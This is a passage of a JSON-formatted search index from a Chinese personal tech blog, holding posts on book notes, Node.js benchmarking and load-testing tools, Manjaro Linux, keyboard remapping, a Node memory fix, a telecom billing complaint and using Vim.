1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,","title":"一日看尽长安花——听北大教授畅讲中国古代文学"},{"content":"5月书单回顾 《鲁滨逊漂流记》 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","permalink":"https://wdd.js.org/posts/2021/06/qpdnp4/","summary":"5月书单回顾 《鲁滨逊漂流记》 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 
《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","title":"6月书单"},{"content":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","permalink":"https://wdd.js.org/fe/js-101-question/","summary":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","title":"Js 101 Question"},{"content":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","permalink":"https://wdd.js.org/posts/2021/06/sxwh8v/","summary":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","title":"1分钟将微信网页版转为桌面应用"},{"content":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 
connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.58 113.03 830.00 84.97% 72034 requests in 10.10s, 17.31MB read Requests/sec: 7134.75 Transfer/sec: 1.71MB # fastify.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.26ms 5.73ms 105.76ms 96.26% Req/Sec 2.08k 490.82 14.63k 94.92% 249114 requests in 10.09s, 44.43MB read Requests/sec: 24688.94 Transfer/sec: 4.40MB fastify是express的3.4倍, 所以对性能有所追求的话,最好用fastify。\n","permalink":"https://wdd.js.org/fe/perf-test-express-fastify/","summary":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.","title":"Perf Test Express Fastify"},{"content":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting. 
Details are available in SCRIPTING and several examples are located in scripts/.\n安装 git clone https://github.com/wg/wrk.git cd wrk make sudo ln -s $PWD/wrk /usr/bin/wrk 基本使用 wrk -t12 -c400 -d30s http://127.0.0.1:8080/index.html Running 30s test @ http://127.0.0.1:8080/index.html 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 635.91us 0.89ms 12.92ms 93.69% Req/Sec 56.20k 8.07k 62.00k 86.54% 22464657 requests in 30.00s, 17.76GB read Requests/sec: 748868.53 Transfer/sec: 606.33MB k6 k6 is a modern load testing tool, building on our years of experience in the load and performance testing industry. It provides a clean, approachable scripting API, local and cloud execution, and flexible configuration.This is how load testing should look in the 21st century.\nhttps://github.com/k6io/k6 go语言开发 优点 支持使用脚本开发测试 功能强大 \u0026hellip;\u0026hellip; 支持将测试结果直接写入influxdb, 这是亮点啊 缺点 如果你只想用几个参数来测试接口,大可不必用k6 安装 # macos brew install k6 // 其他平台也是支持的,参考官方文档 autocannon Javascript/Node.js https://github.com/mcollina/autocannon 优点 如果你是Node.js开发者,安装autocannon是非常简单的 安装 npm i autocannon -g 使用 ali https://github.com/nakabonne/ali go语言开发 特点 支持自动在控制台绘图 安装 brew install nakabonne/ali/ali ","permalink":"https://wdd.js.org/posts/2021/05/fxv15g/","summary":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. 
An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting.","title":"5个接口压力测试工具"},{"content":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility. 
https://wiki.manjaro.org/index.php/About_Manjaro\nhttps://wiki.manjaro.org/index.php/Manjaro:A_Different_Kind_of_Beast https://wiki.manjaro.org/index.php/Manjaro_FAQ https://wiki.manjaro.org/index.php/Main_Page https://wiki.manjaro.org/index.php/Using_Manjaro_for_Beginners ","permalink":"https://wdd.js.org/posts/2021/05/cntrwh/","summary":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. 
https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility.","title":"又发现了一个宝藏linux发行版 manjaro"},{"content":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","permalink":"https://wdd.js.org/posts/2021/05/xneq08/","summary":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. 
pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","title":"tavern"},{"content":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension\n","permalink":"https://wdd.js.org/posts/2021/05/eafyk8/","summary":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension","title":"大写锁定键映射为escape"},{"content":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。\n","permalink":"https://wdd.js.org/posts/2021/05/wsoivr/","summary":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。","title":"牛津通识读本:数学(中文版)笔记"},{"content":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 
小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧\n","permalink":"https://wdd.js.org/posts/2021/05/uvq06k/","summary":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 
得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧","title":"鲁滨逊漂流记 笔记与读后感"},{"content":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.\n参考 https://nodejs.org/api/cli.html#cli_max_old_space_size_size_in_megabytes https://stackoverflow.com/questions/54919258/ng-commands-throws-insufficient-memory-error-fatal-process-oom-in-insufficient https://medium.com/@vuongtran/how-to-solve-process-out-of-memory-in-node-js-5f0de8f8464c ","permalink":"https://wdd.js.org/fe/oom-in-insufficient-memory/","summary":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. 
You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.","title":"Fatal process OOM in insufficient memory to create an Isolate"},{"content":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","permalink":"https://wdd.js.org/posts/2021/05/ae2rme/","summary":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","title":"官方客服也开始割韭菜"},{"content":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 
VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?\n","permalink":"https://wdd.js.org/vim/why-you-leave-vim/","summary":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?","title":"让你放弃VIM的一些原因"},{"content":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 